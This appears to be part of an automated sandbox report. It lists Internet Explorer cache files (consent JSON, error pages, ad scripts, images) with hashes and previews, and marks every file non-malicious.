                                                Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":80,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\de-ch[2].json
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                Category:dropped
                                                Size (bytes):79097
                                                Entropy (8bit):5.337866393801766
                                                Encrypted:false
                                                SSDEEP:768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCgP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlDxHga7B
                                                MD5:408DDD452219F77E388108945DE7D0FE
                                                SHA1:C34BAE1E2EBD5867CB735A5C9573E08C4787E8E7
                                                SHA-256:197C124AD4B7DD42D6628B9BEFD54226CCDCD631ECFAEE6FB857195835F3B385
                                                SHA-512:17B4CF649A4EAE86A6A38ABA535CAF0AEFB318D06765729053FDE4CD2EFEE7C13097286D0B8595435D0EB62EF09182A9A10CFEE2E71B72B74A6566A2697EAB1B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: {"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\dnserror[1]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):2997
                                                Entropy (8bit):4.4885437940628465
                                                Encrypted:false
                                                SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                                MD5:2DC61EB461DA1436F5D22BCE51425660
                                                SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                                SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                                SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\dnserror[2]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):2997
                                                Entropy (8bit):4.4885437940628465
                                                Encrypted:false
                                                SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                                MD5:2DC61EB461DA1436F5D22BCE51425660
                                                SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                                SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                                SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\down[1]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                Category:dropped
                                                Size (bytes):748
                                                Entropy (8bit):7.249606135668305
                                                Encrypted:false
                                                SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                MD5:C4F558C4C8B56858F15C09037CD6625A
                                                SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\e151e5[1].gif
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:GIF image data, version 89a, 1 x 1
                                                Category:dropped
                                                Size (bytes):43
                                                Entropy (8bit):3.122191481864228
                                                Encrypted:false
                                                SSDEEP:3:CUTxls/1h/:7lU/
                                                MD5:F8614595FBA50D96389708A4135776E4
                                                SHA1:D456164972B508172CEE9D1CC06D1EA35CA15C21
                                                SHA-256:7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
                                                SHA-512:299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: GIF89a.............!.......,...........D..;
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\errorPageStrings[1]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):5.164796203267696
                                                Encrypted:false
                                                SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\httpErrorPagesScripts[1]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):12105
                                                Entropy (8bit):5.451485481468043
                                                Encrypted:false
                                                SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                MD5:9234071287E637F85D721463C488704C
                                                SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\http___cdn.taboola.com_libtrc_static_thumbnails_5f3d7819fc402dab11ff0cbe39c46367[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                Category:dropped
                                                Size (bytes):15107
                                                Entropy (8bit):7.945604899362312
                                                Encrypted:false
                                                SSDEEP:384:ZvluvjbVeUIkZ9BKQ7PBfZQ9edCicC7n4S29P:ZvAvjbhxBdlKMdCe7nY
                                                MD5:09A6961E625E1651F3F490355F583DD3
                                                SHA1:22E22F85127B348E1420D4DF3C4F87CE85C17778
                                                SHA-256:BAEAB3DF91463B16F227ABA9BFFF30DCB06D29429E1E65E21C8A290236CA6E82
                                                SHA-512:F67B242FE95797D05187FF38E6D09ACCC2F778ECF0B9EE0EF8D6F75943FF71C43099DB4B6AF9A65C21F41332A46343D69D7B6DFCFBABA7A0B62D8AC3DADC1341
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF..........................................................+".."+2*(*2<66<LHLdd.............................................+".."+2*(*2<66<LHLdd.......7...."..........4................................................................Gv.Y7.e.j[K...Xu./T..V...rO3wQ........... ..Sp...Ic...cu.Z.......5L.i(R.i...v....e.=g....;M...JS.f..U.f..f.\.$...x.c.$|F..'.X]L..;.R.DdE4.b.u[K..'..W,\.i...iND....\n$...o..M<2.o(.^F.*GhI...`.R...9rM`!M(..z.Q(..L .J..<.?..Q7o+....HRp...l..9.7RUyA..=h.Z.....[/..,4:I...;8#....f..q.(..V6...N(WV4f.]YU[..8....u...t...5_...,b..I..tgI.+.}...x+-..RsZ.....i..C.k.....mr7u.....KO.R/.0.S..S3............k...Sd.....qp. ......vT.^.WE.I...6P.m,.N....iE..o?.h...Q/...Z"...q2h7 zE.0s@'.#..Q.+\....m...t.^.I......%.70L.vj.+.....U...Ex..e.oSwX..T.c.*$...h.@.zh1.~..T$.3T..$B.HhM+.b)K(c.vAZ...~B.....y.OsW....b. F..o....i.C{...g.F,3;.y...f.T..T.s*.-..J....x........I....d......P..+v...n1......x.@..|.9.U..<..I..T...&."Sf......h4(..ha
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\iab2Data[1].json
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                Category:dropped
                                                Size (bytes):242382
                                                Entropy (8bit):5.1486574437549235
                                                Encrypted:false
                                                SSDEEP:768:l3JqIW6A3pZcOkv+prD5bxLkjO68KQHamIT4Ff5+wbUk6syZ7TMwz:l3JqINA3kR4D5bxLk78KsIkfZ6hBz
                                                MD5:D76FFE379391B1C7EE0773A842843B7E
                                                SHA1:772ED93B31A368AE8548D22E72DDE24BB6E3855C
                                                SHA-256:D0EB78606C49FCD41E2032EC6CC6A985041587AAEE3AE15B6D3B693A924F08F2
                                                SHA-512:23E7888E069D05812710BF56CC76805A4E836B88F7493EC6F669F72A55D5D85AD86AD608650E708FA1861BC78A139616322D34962FD6BE0D64E0BEA0107BF4F4
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: {"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\location[1].js
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):182
                                                Entropy (8bit):4.685293041881485
                                                Encrypted:false
                                                SSDEEP:3:LUfGC48HlHJ2R4OE9HQnpK9fQ8I5CMnRMRU8x4RiiP22/90+apWyRHfHO:nCf4R5ElWpKWjvRMmhLP2saVO
                                                MD5:C4F67A4EFC37372559CD375AA74454A3
                                                SHA1:2B7303240D7CBEF2B7B9F3D22D306CC04CBFBE56
                                                SHA-256:C72856B40493B0C4A9FC25F80A10DFBF268B23B30A07D18AF4783017F54165DE
                                                SHA-512:1EE4D2C1ED8044128DCDCDB97DC8680886AD0EC06C856F2449B67A6B0B9D7DE0A5EA2BBA54EB405AB129DD0247E605B68DC11CEB6A074E6CF088A73948AF2481
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\tag[1].js
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):10055
                                                Entropy (8bit):5.443998211079296
                                                Encrypted:false
                                                SSDEEP:192:4EamzdxOBoOYcpxrzZp50set1XDdVYnMLiKGWdrHpOIztlomlRIkr:4EamR7Ohxr9L0HBV+MLxGWdrVY+
                                                MD5:89A48656B1A403FD1B77C8C5682B2110
                                                SHA1:5314E9541F542965B237E654A40AF9BED66540EB
                                                SHA-256:C23483E07055D45989FE4A74C6C00E47210C1552D240360D19F2D86CA3128CCE
                                                SHA-512:1C7CC0B8348B6E4114C2833F7E099DD556C53DE6E7DFFBC7B50445EE0B4991AE7F1AE1D90DB24133BF45D39755DA154DF60FDDD28501D782692C379D9C3DAF99
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: !function(){"use strict";function r(e,i,c,l){return new(c=c||Promise)(function(n,t){function o(e){try{r(l.next(e))}catch(e){t(e)}}function a(e){try{r(l.throw(e))}catch(e){t(e)}}function r(e){var t;e.done?n(e.value):((t=e.value)instanceof c?t:new c(function(e){e(t)})).then(o,a)}r((l=l.apply(e,i||[])).next())})}function i(n,o){var a,r,i,e,c={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return e={next:t(0),throw:t(1),return:t(2)},"function"==typeof Symbol&&(e[Symbol.iterator]=function(){return this}),e;function t(t){return function(e){return function(t){if(a)throw new TypeError("Generator is already executing.");for(;c;)try{if(a=1,r&&(i=2&t[0]?r.return:t[0]?r.throw||((i=r.return)&&i.call(r),0):r.next)&&!(i=i.call(r,t[1])).done)return i;switch(r=0,i&&(t=[2&t[0],i.value]),t[0]){case 0:case 1:i=t;break;case 4:return c.label++,{value:t[1],done:!1};case 5:c.label++,r=t[1],t=[0];continue;case 7:t=c.ops.pop(),c.trys.pop();continue;default:if(!(i=0<(i=c.trys).length&&
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\17-361657-68ddb2ab[1].js
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:ASCII text, with very long lines, with no line terminators
                                                Category:dropped
                                                Size (bytes):1238
                                                Entropy (8bit):5.066474690445609
                                                Encrypted:false
                                                SSDEEP:24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
                                                MD5:7ADA9104CCDE3FDFB92233C8D389C582
                                                SHA1:4E5BA29703A7329EC3B63192DE30451272348E0D
                                                SHA-256:F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
                                                SHA-512:2967FBCE4E1C6A69058FDE4C3DC2E269557F7FAD71146F3CCD6FC9085A439B7D067D5D1F8BD2C7EC9124B7E760FBC7F25F30DF21F9B3F61D1443EC3C214E3FFF
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: define("meOffice",["jquery","jqBehavior","mediator","refreshModules","headData","webStorage","window"],function(n,t,i,r,u,f,e){function o(t,o){function v(n){var r=e.localStorage,i,t,u;if(r&&r.deferLoadedItems)for(i=r.deferLoadedItems.split(","),t=0,u=i.length;t<u;t++)if(i[t]&&i[t].indexOf(n)!==-1){f.removeItem(i[t]);break}}function a(){var i=t.find("section li time");i.each(function(){var t=new Date(n(this).attr("datetime"));t&&n(this).html(t.toLocaleString())})}function p(){c=t.find("[data-module-id]").eq(0);c.length&&(h=c.data("moduleId"),h&&(l="moduleRefreshed-"+h,i.sub(l,a)))}function y(){i.unsub(o.eventName,y);r(s).done(function(){a();p()})}var s,c,h,l;return u.signedin||(t.hasClass("office")?v("meOffice"):t.hasClass("onenote")&&v("meOneNote")),{setup:function(){s=t.find("[data-module-deferred-hover], [data-module-deferred]").not("[data-sso-dependent]");s.length&&s.data("module-deferred-hover")&&s.html("<p class='meloading'><\/p>");i.sub(o.eventName,y)},teardown:function(){h&&i.un
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\52-478955-68ddb2ab[1].js
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                Category:dropped
                                                Size (bytes):396806
                                                Entropy (8bit):5.324119649220133
                                                Encrypted:false
                                                SSDEEP:6144:YXP9M/wSg/jgyYZw44KfhmnidDWPqIjHSjaXCr1BgxO0DkV4FcjtIuNK:CW/VonidDWPqIjHdC16tbcjut
                                                MD5:3BBA5129E3BFA05EF2B57F231B5E7A10
                                                SHA1:7CDF93AD45B9624105F0805E3BE03310F43C8B37
                                                SHA-256:270DA5C0051987EBCEDBF06B98110CEE3ADE3E9DA71A3AB5C09C404FBA09CC60
                                                SHA-512:FD976CB278DAC5AB411A0EEDE0BCA22BCFE5D244F56A7666D93C5C3C4C5C55CCBFBAB33143D399E72C9FBB66833A787E3E5114CDBC5F679449923F8867B089A0
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: var awa,behaviorKey,Perf,globalLeft,Gemini,Telemetry,utils,data,MSANTracker,deferredCanary,g_ashsC,g_hsSetup,canary;window._perfMarker&&window._perfMarker("TimeToJsBundleExecutionStart");define("jqBehavior",["jquery","viewport"],function(n){return function(t,i,r){function u(n){var t=n.length;return t>1?function(){for(var i=0;i<t;i++)n[i]()}:t?n[0]:f}function f(){}if(typeof t!="function")throw"Behavior constructor must be a function";if(i&&typeof i!="object")throw"Defaults must be an object or null";if(r&&typeof r!="object")throw"Exclude must be an object or null";return r=r||{},function(f,e,o){function c(n){n&&(typeof n.setup=="function"&&l.push(n.setup),typeof n.teardown=="function"&&a.push(n.teardown),typeof n.update=="function"&&v.push(n.update))}var h;if(o&&typeof o!="object")throw"Options must be an object or null";var s=n.extend(!0,{},i,o),l=[],a=[],v=[],y=!0;if(r.query){if(typeof f!="string")throw"Selector must be a string";c(t(f,s))}else h=n(f,e),r.each?c(t(h,s)):(y=h.length>0,
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AANf6qa[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):432
                                                Entropy (8bit):7.252548911424453
                                                Encrypted:false
                                                SSDEEP:6:6v/lhPahm7saDdLbPvjAEQhnZxqQ7FULH4hYHgjtoYFWYooCUQVHyXRTTrYm/RTy:6v/79Zb8FZxqQJ4Yhro0Lsm96d
                                                MD5:7ED73D785784B44CF3BD897AB475E5CF
                                                SHA1:47A753F5550D727F2FB5535AD77F5042E5F6D954
                                                SHA-256:EEEA2FBC7695452F186059EC6668A2C8AE469975EBBAF5140B8AC40F642AC466
                                                SHA-512:FAF9E3AF38796B906F198712772ACBF361820367BDC550076D6D89C2F474082CC79725EC81CECF661FA9EFF3316EE10853C75594D5022319EAE9D078802D9C77
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+.....bIDATx..?..a..?.3.w`.x.&..d..Q.L..LJ^.o...,....DR,.$.O.....r.ws..<.<.|..|..x..?....^..j..r...F..v<.........t.d2.^...x<b6....\.WT...L".`8.R......m.N'..`0H.T..vc...@.H$..+..~..j....N.....~.O.Z%..+..T*.r...#.....F2..X,.Z.h4..R)z..6.s:...l2...l....N>...dB6.%..i...)....q...^..n.K&..^..X,>'..dT)..v:.0D.Q.y>.#.u:.,...Z..r..../h..u....#'.v........._&^....~..ol.#....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOfNp5[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                Category:dropped
                                                Size (bytes):21488
                                                Entropy (8bit):7.956074967094666
                                                Encrypted:false
                                                SSDEEP:384:NK8ca6taiPAEHF8X/lQuWgJyiaHcwnI143gZ4UTuRavxmg4hBcm0n:Nv4l8PGuWCyiaELZdCk67y
                                                MD5:766190A0D6ACA6A6D464679662CF7E37
                                                SHA1:96B3FEF16953B6A65C61E9A10D94CAE57B60D901
                                                SHA-256:1538E167FBD736AD5A25A064C203D4A4AF609028171C2BC159CB546318D8986E
                                                SHA-512:E35464583A4AE460573C68460B15B9F0369AD11D7F4401A0F502EAB3FFCAD61B5E88F2CE1BF93AC3B2460D482A73A97D63D08E56A5105FA74DA8212A2FF34775
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....-.Tt..3..#.......2?.fl.T..!.0..9..e.U.>.,u.7.".p\.:..zRG...bT{..d.V....&.B(..1<.gf.#.Q..!.c4..8#......c?i2>..s..R(.o.5.l2.6...@.m.xC.O#.5%Xm...-.e?.M..jI.<+....c..|....i..$..l..z.\...<aJ...ERBfD.Io'.:...j....\...CE..4..{4.....7|R.)L...l...l}..2.3~;.e.$RH.3.d....G.)X...m..pN.y...3n.........f.Y.X.e..=*.CDM R.[l......E.b$.a.*r..C-.K".b5.G^:.CdpI#......T.&..]T..=8..f..b. ..m
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOgLVz[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                Category:dropped
                                                Size (bytes):16649
                                                Entropy (8bit):7.922396366675045
                                                Encrypted:false
                                                SSDEEP:384:NA5v/9KF/LSZhyMDpqN6teoBMj+8sn+V5VaQmWjO:NA5ozSZhyBEYoBErsnEhmWK
                                                MD5:4035F9FD75175AB6DE70B4BDAD9A055B
                                                SHA1:7587562801349B57565E1992094B9704EC74EA0B
                                                SHA-256:BE74D2288FFD9CF5A34F65FF988A5C6ACD9273EFFFD62F875674B3A1DB1E6A2D
                                                SHA-512:5D429D4DA9598AB5FE06C74A55F549B7486C8D98E817455B6FAC487080DFD5A38A5CD828DDD77A35BA8E6249D440FFB0BCE02D936A76342DC4FB05569CD9181F
                                                Malicious:false
                                                Reputation:unknown
